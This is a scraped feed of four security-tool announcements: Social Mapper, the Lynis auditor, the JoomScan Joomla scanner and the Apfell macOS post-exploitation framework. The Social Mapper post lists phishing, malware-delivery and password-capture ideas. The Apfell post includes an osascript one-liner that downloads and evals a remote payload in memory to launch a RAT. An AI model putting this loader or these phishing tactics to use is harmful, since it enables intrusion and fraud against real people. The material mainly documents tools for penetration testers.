A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin(Greenwolf)Social Mapper is a Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to searching popular social media sites for targets names and pictures to accurately detect and group a person’s presence, outputting the results into report that a human operator can quickly review.Social Mapper has a variety of uses in the security industry, for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results, so that reviewing this data is quicker for a human operator.Social Mapper supports the following social media platforms:LinkedInFacebookTwitterGooglePlusInstagramVKontakteWeiboDoubanSocial Mapper takes a variety of input types such as:An organisations name, searching via LinkedInA folder full of named imagesA CSV file with names and url’s to images online”Usecases (Why you want to run this)Social Mapper is primarily aimed at Penetration Testers and Red Teamers, who will use it to expand their target lists and find their social media profiles. From here what you do is only limited by your imagination, but here are a few ideas to get started:(Note: Social Mapper does not perform these attacks, it gathers you the data you need to perform them on a mass scale.)Create fake social media profiles to ‘friend’ the targets and send them links or malware. Recent statistics show social media users are more than twice as likely to click on links and open documents compared to those delivered via email.Trick users into disclosing their emails and phone numbers with vouchers and offers to make the pivot into phishing, vishing or smishing.Create custom phishing campaigns for each social media site, knowing that the target has an account. Make these more realistic by including their profile picture in the email. Capture the passwords for password reuse.View target photos looking for employee access card badges and familiarise yourself with building interiors.Getting StartedThese instructions will show you the requirements for and how to use Social Mapper.PrerequisitesAs this is a python based tool, it should theoretically run on Linux, Mac and Windows. The main requirements are Firefox, Selenium and Geckodriver. To install the tool and set it up follow these 4 steps:Install the latest version of Mozilla Firefox here:https://www.mozilla.org/en-GB/firefox/new/Install the Geckodriver for your operating system and make sure it’s in your path, on Mac you and place it in /usr/local/bin and on Linux /usr/bin. You can down load it here:https://github.com/mozilla/geckodriver/releasesInstall the required python 2.7 libaries:git clone https://github.com/SpiderLabs/social_mappercd social_mapper/setuppip install -r requirements.txtProvide Social Mapper with Credentials to log into social media services:Open social_mapper.py and enter social media credentials into global variables at the top of the fileUsing Social MapperSocial Mapper is run from the command line using a mix of required and optional parameters. You can specify options such as input type and which sites to check alongside a number of other parameters which affect speed and accuracy.Required ParametersTo start up the tool 4 parameters must be provided, an input format, the input file or folder and the basic running mode:-f, –format : Specify if the -i, –input is a ‘name’, ‘csv’, ‘imagefolder’ or ‘socialmapper’ resume file-i, –input : The company name, a csv file, imagefolder or social mapper html file to feed into social mapper-m, –mode : Fast or Accurate allows you to choose to skip potential targets after a first likely match is found, in some cases potentially speeding up the program x20Additionally at least one social media site to check must be selected by including one or more of the following:-a, –all : Selects all of the options below and checks every site that social mapper has credentials for-fb, –facebook : Check Facebook-tw, –twitter : Check Twitter-ig, –instagram : Check Instagram-li, –linkedin : Check LinkedIn-gp, –googleplus : Check GooglePlus-vk, –vkontakte : Check VKontakte-wb, –weibo : Check Weibo-db, –douban : Check DoubanOptional ParametersAdditional optional parameters can also be set to add additional customisation to the way social mapper runs:-t, –threshold : Customises the faceial recognition threshold for matches, this can be seen as the match accuracy. Default is ‘standard’, but can be set to loose, standard, strict or superstrict. For example loose will find more matches, but some may be incorrect. While strict may find less matches but also contain less false positives in the final report. -cid, –companyid : Additional parameter to add in a LinkedIn Company ID for if name searches are not picking the correct company.-s, –showbrowser : Makes the Firefox browser visable so you can see the searches performed. Useful for debugging. -v, –version : Display current versionExample RunsHere are a couple of example runs to get started for differing use cases:A quick run for facebook and twitter on some targets you have in an imagefolder, that you plan to manually review and don’t mind some false positives:python social_mapper.py -f imagefolder -i ./mytargets -m fast -fb -twA exhaustive run on a large company where false positives must be kept to a minimum:python social_mapper.py -f company -i “SpiderLabs" -m accurate -a -t strictA large run that needs to be split over multiple sessions due to time, the first run doing LinkedIn and Facebook, with the second resuming and filling in Twitter, Google Plus and Instagram:python social_mapper.py -f company -i "SpiderLabs" -m accurate -li -fbpython social_mapper.py -f socialmapper -i ./SpiderLabs-social-mapper-linkedin-facebook.html -m accurate -tw -gp -igTroubleshootingSocial Media sites often change their page formats and class names, if Social Mapper isn’t working for you on a specific site, check out the docs section for troubleshooting advice on how to fix it. Please feel free to submit a pull request with your fixes.MaltegoFor a guide to loading your Social Mapper results into Maltego, check out the docs section.AuthorsJacob Wilkin – Research and Development – Trustwave SpiderLabsDownload Social Mapper

Link: http://feedproxy.google.com/~r/PentestTools/~3/ECFiCva24WU/social-mapper-social-media-enumeration.html

Lynis 2.6.7 – Security Auditing Tool for Unix/Linux Systems

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.Supported operating systemsThe tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:AIXFreeBSDHP-UXLinuxMac OSNetBSDOpenBSDSolarisand othersIt even runs on systems like the Raspberry Pi and several storage devices!Installation optionalLynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use “./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). How it worksLynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.StepsDetermine operating systemSearch for available tools and utilitiesCheck for Lynis updateRun tests from enabled pluginsRun security tests per categoryReport status of security scanBesides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.Opportunistic ScanningLynis scanning is opportunistic: it uses what it can find.For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates so they can be scanned later as well.In-depth security scansBy performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!Use casesSince Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:Security auditingCompliance testing (e.g. PCI, HIPAA, SOx)Vulnerability detection and scanningSystem hardeningResources used for testingMany other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.Best practicesCISNISTNSAOpenSCAP dataVendor guides and recommendations (e.g. Debian Gentoo, Red Hat)Lynis PluginsPlugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.ChangelogUpgrade note## Lynis 2.6.7### Changed- BOOT-5104 – Added busybox as a service manager- KRNL-5677 – Limit PAE and no-execute test to AMD64 hardware only- LOGG-2190 – Ignore /dev/zero and /dev/[aio] as deleted files- SSH-7408 – Changed classification of SSH root login with keys- Docker scan uses new format for maintainer value- New URL structure on CISOfy website implemented for Lynis controlsDownload Lynis 2.6.7

Link: http://feedproxy.google.com/~r/PentestTools/~3/cjXe5Qqu-Uw/lynis-267-security-auditing-tool-for.html

JoomScan 0.0.6 – OWASP Joomla Vulnerability Scanner Project

OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system. Furthermore, OWASP JoomScan provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads.OWASP JoomScan is included in Kali Linux distributions.WHY OWASP JOOMSCAN ?Automated …Version enumeratorVulnerability enumerator (based on version)Components enumerator (1209 most popular by default)Components vulnerability enumerator (based on version)(+1030 exploit)Firewall detectorReporting to Text & HTML outputFinding common log filesFinding common backup filesINSTALLgit clone https://github.com/rezasp/joomscan.gitcd joomscanperl joomscan.plJOOMSCAN ARGUMENTSUsage: joomscan.pl [options]–url | -u | The Joomla URL/domain to scan.–enumerate-components | -ec | Try to enumerate components.–cookie <String> | Set cookie.–user-agent | -a <user-agent> | Use the specified User-Agent.–random-agent | -r | Use a random User-Agent.–timeout <time-out> | set timeout.–about | About Author–update | Update to the latest version.–help | -h | This help screen.–version | Output the current version and exit.OWASP JOOMSCAN USAGE EXAMPLESDo default checks…perl joomscan.pl –url www.example.comorperl joomscan.pl -u www.example.com Enumerate installed components…perl joomscan.pl –url www.example.com –enumerate-componentsorperl joomscan.pl -u www.example.com –ecSet cookieperl joomscan.pl –url www.example.com –cookie “test=demo;" Set user-agentperl joomscan.pl –url www.example.com –user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"orperl joomscan.pl -u www.example.com -a "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"Set random user-agentperl joomscan.pl -u www.example.com –random-agentorperl joomscan.pl –url www.example.com -rUpdate Joomscan…perl joomscan.pl –updatePROJECT LEADERSMohammad Reza Espargham [ reza[dot]espargham[at]owasp[dot]org ]Ali Razmjoo [ ali[dot]razmjoo[at]owasp[dot]org ]OWASP JoomScan introduction (Youtube)OWASP JoomScan 0.0.6 [#BHUSA]Updated vulnerability databasesAdded new module: Firewall Detector (supports detection of [CloudFlare, Incapsula, Shieldfy, Mod_Security])Added exploit for com_joomanagerUpdated list of common log pathsA few enhancementsDownload Joomscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/LkQh4-Er0AQ/joomscan-006-owasp-joomla-vulnerability.html

Apfell – A macOS, Post-Exploit, Red Teaming Framework

A macOS, post-exploit, red teaming framework built with python3 and JavaScript. It’s designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout mac and linux based red teaming.DetailsCheck out thre blog post on the initial release of the framework and what the bare bones content can do.InstallationGet the code from this github:git clone https://github.com/its-a-feature/ApfellInstall and setup the requirements (Note: The Sanic webserver says it only works on Linux):# The setup.sh will install postgres and pip3 install the requirementscd Apfell && chmod +x setup.sh && sudo ./setup.sh && cd ..Configure the installation in app/__init__.py:# ——– CONFIGURE SETTINGS HERE ———–db_name = ‘apfell_db’db_user = ‘apfell_user’db_pass = ‘super_secret_apfell_user_password’server_ip = ‘’ # this will be used by the browser to callback here, edit this!listen_port = ‘443’listen_ip = ‘’ # IP to bind to for the server, means all local IPv4 addressesssl_cert_path = ‘./app/ssl/apfell-cert.pem’ssl_key_path = ‘./app/ssl/apfell-ssl.key’use_ssl = TrueThere is currently an issue with Sanic and websockets 6/7 (tracked issue, but no pull request yet) You need to edit Sanic with a slight update (I’m going to make a pull request for Sanic so we don’t need to do this, but that’ll take a little while). In the meantime, do sudo find / -type f -name “app.py" to find the appropriate Sanic file to edit. In here, find the line that says protocol = request.transport._protocol and edit it to be:if hasattr(request.transport, ‘_app_protocol’) protocol = request.transport._app_protocolelse: protocol = request.transport._protocolUsageStart the server:python3 server.py [2018-07-16 14:39:14 -0700] [28381] [INFO] Goin’ Fast @ default, the server will bind to on port 443. This is an alias meaning that it will be listening on all IPv4 addresses on the machine. You don’t actually browse to in your browser. Instead, you’ll browse to either https://localhost:443 if you’re on the same machine that’s running the server, or you can browse to any of the IPv4 addresses on the machine that’s running the server. You could also browse to the IP address you specified in server_ip = ‘’ in the installation section.Browse to the server with any modern web browser Create a new user: Create a new payload:Use the attacks_api to host the new file (this will eventually get updated with a GUI): # assuming we created a payload in our local ‘/tmp’ directorycurl -X POST'{"port":8080, "directory":"/tmp"}’ will start a python simple web server in the /tmp directory on port 8080.Pull down and execute payload in memory:osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString(‘HTTP://’)),$.NSUTF8StringEncoding)));" Interact with the new RAT: Download Apfell

Link: http://feedproxy.google.com/~r/PentestTools/~3/9wqU15O2-l4/apfell-macos-post-exploit-red-teaming.html